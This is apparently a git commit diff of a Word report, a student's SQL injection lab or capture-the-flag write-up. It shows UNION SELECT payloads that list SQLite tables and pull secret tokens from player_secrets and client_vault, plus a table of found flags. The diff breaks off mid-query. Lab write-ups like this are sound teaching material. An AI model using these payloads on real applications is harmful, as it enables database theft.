<commit_message>
task 1 & 2 done
</commit_message>
<xml_diff>
--- a/report.docx
+++ b/report.docx
@@ -40,6 +40,14 @@
     <w:p/>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:ligatures w14:val="standardContextual"/>
+        </w:rPr>
         <w:id w:val="914981895"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
@@ -48,15 +56,9 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w14:ligatures w14:val="standardContextual"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -176,7 +178,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>Testing basic query , got basic table and user information</w:t>
+        <w:t xml:space="preserve">Testing basic </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>query ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> got basic table and user information</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -190,7 +200,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="3B3E1F9A">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="66CACC8E">
             <wp:extent cx="5411349" cy="3040083"/>
             <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="812995017" name="Picture 1"/>
@@ -256,7 +266,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="7F6AB211">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="19016D4C">
             <wp:extent cx="5403273" cy="3035547"/>
             <wp:effectExtent l="0" t="0" r="6985" b="0"/>
             <wp:docPr id="1998281954" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
@@ -318,7 +328,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="26D7DA42">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="6B438991">
             <wp:extent cx="5284519" cy="2968831"/>
             <wp:effectExtent l="0" t="0" r="0" b="3175"/>
             <wp:docPr id="1882154418" name="Picture 3"/>
@@ -383,7 +393,15 @@
         <w:t>%’</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM sqlite_master WHERE type='table' --</w:t>
+        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> WHERE type='table' --</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -431,6 +449,1099 @@
                     <a:ln>
                       <a:noFill/>
                     </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">And I found </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a ”</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>” table</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B58A0B9" wp14:editId="64316A2F">
+            <wp:extent cx="5943600" cy="1235710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="146316884" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="146316884" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1235710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Getting data from that “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>” table</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%'UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>secret_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reward_points</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, 0 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>player_secrets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289DBC68" wp14:editId="0227579A">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="745429139" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="745429139" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>Found the flags now submitting and seeing which one works!</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9037" w:type="dxa"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7197"/>
+        <w:gridCol w:w="1840"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="763"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Flags Found</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Correct?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>This_is_not_the_flag</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_1}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_ture_1}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_2}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Hello_world_to_SQLi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>999</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7197" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>FLAG{Trust_me_its_ture_2}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1840" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>YESSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1323071F" wp14:editId="15C4DDCE">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="220613495" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="220613495" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">SQL Injection </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Advance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Exploit a bit advanced SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Query</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Starting of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>query: %</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E83EBC" wp14:editId="63BB8AEF">
+            <wp:extent cx="5197642" cy="2926450"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
+            <wp:docPr id="1145902736" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1145902736" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5200285" cy="2927938"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>now further exploring the columns</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>%' UNION SELECT 'a','b',1,'c' ORDER by budget --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABC84BB" wp14:editId="51611172">
+            <wp:extent cx="5094514" cy="2864030"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="853721749" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="853721749" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5109978" cy="2872723"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Now getting the table names</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">query:  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%' UNION SELECT name, 'x', 1, 'x' FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Found a table named “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>” ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I think</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the flag</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> might be there </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72306EAB" wp14:editId="1BAC5AF7">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="221947274" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="221947274" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>And using the hints got this from “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” table by accessing the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encrypted_data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> column</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">%' UNION SELECT 1, </w:t>
+      </w:r>
